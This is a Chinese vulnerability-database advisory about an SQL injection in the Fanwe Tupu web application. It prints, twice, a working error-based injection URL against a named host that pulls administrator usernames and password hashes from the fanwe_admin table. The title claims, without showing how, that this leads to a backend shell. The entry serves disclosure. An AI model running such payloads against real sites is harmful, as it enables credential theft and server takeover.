方维图谱前台SQL注入后台拿shell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 方维图谱前台sql注入后台拿shell ### 详细说明: http://t1.fanwe.net:85/index.php?action=index&hot=5' 报错 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,admin_name,0x3a,admin_pwd,0x23) FROM fanwe_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) [<img src="https://images.seebug.org/upload/201409/061118159568d16bac1b8886f332225375361d77.jpg" alt="NV]I9Z{1FO}8_F%TQ53B7~M.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/061118159568d16bac1b8886f332225375361d77.jpg) ### 漏洞证明: http://t1.fanwe.net:85/index.php?action=index&hot=5' 报错 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,admin_name,0x3a,admin_pwd,0x23) FROM fanwe_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息